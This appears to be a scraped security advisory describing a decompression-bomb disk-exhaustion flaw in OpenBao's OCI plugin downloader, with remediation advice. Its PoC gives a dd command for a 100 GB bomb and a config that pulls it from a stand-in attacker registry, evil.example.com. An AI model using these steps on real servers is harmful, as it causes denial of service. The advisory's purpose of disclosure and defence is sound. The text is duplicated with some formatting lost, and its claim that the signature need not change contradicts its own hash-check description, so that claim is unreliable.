Summary
ExtractPluginFromImage() in OpenBao's OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via io.Copy with no upper bound on the number of bytes written.
An attacker who controls or compromises the OCI registry referenced in the victim's configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file.
The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace legit plugin image with no need to change its signature.
Details
Root cause
helper/pluginutil/oci/downloader.go:301:
if _, copyErr := io.Copy(outFile, tarReader); copyErr != nil {io.Copy() reads until EOF with no size limit.
The tar header.Size field is never validated before the copy, and mutate.Extract decompresses all gzip layers in memory/streaming, resulting in unbounded decompression-to-disk.
PoC
- Set up a malicious OCI registry
- Create a decompression bomb binary:
dd if=/dev/zero bs=1G count=100 > /tmp/bomb-binary
- Package it in a minimal OCI image
- Push to the malicious registry
- Configure victim OpenBao to use this registry:
plugin "secrets" "bomb" {
image = "evil.example.com/plugin"
version = "v1.0.0"
binary_name = "openbao-plugin-secrets-bomb"
sha256sum = "0000000000000000000000000000000000000000000000000000000000000000"
}
plugin_auto_download = true
- Start OpenBao (or trigger SIGHUP), load OCI image, disk fill -> cause DoS
Impact
- Denial of Service: Disk exhaustion on the OpenBao server
- Cascading failure: Co-located services (databases, other apps) also fail when the disk is full
- Difficult recovery: If the process is killed mid-extraction, the partial file remains on disk and is not cleaned up
- Repeated exploitation: On SIGHUP or restart with plugin_auto_download = true, the bomb is re-downloaded
Remediation
- Validate
header.Size against a configurable maximum before opening the output file
- Wrap
tarReader in io.LimitReader(tarReader, maxSize+1) and check bytes written after copy
- Add a max_size configuration field to PluginConfig for operator control (default: 1 GiB)
References
n1rwhex Reporter
Summary
ExtractPluginFromImage()in OpenBao's OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data viaio.Copywith no upper bound on the number of bytes written.An attacker who controls or compromises the OCI registry referenced in the victim's configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file.
The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace legit plugin image with no need to change its signature.
Details
Root cause
helper/pluginutil/oci/downloader.go:301:io.Copy()reads until EOF with no size limit.The tar
header.Sizefield is never validated before the copy, andmutate.Extractdecompresses all gzip layers in memory/streaming, resulting in unbounded decompression-to-disk.PoC
dd if=/dev/zero bs=1G count=100 > /tmp/bomb-binaryImpact
Remediation
header.Sizeagainst a configurable maximum before opening the output filetarReaderinio.LimitReader(tarReader, maxSize+1)and check bytes written after copyReferences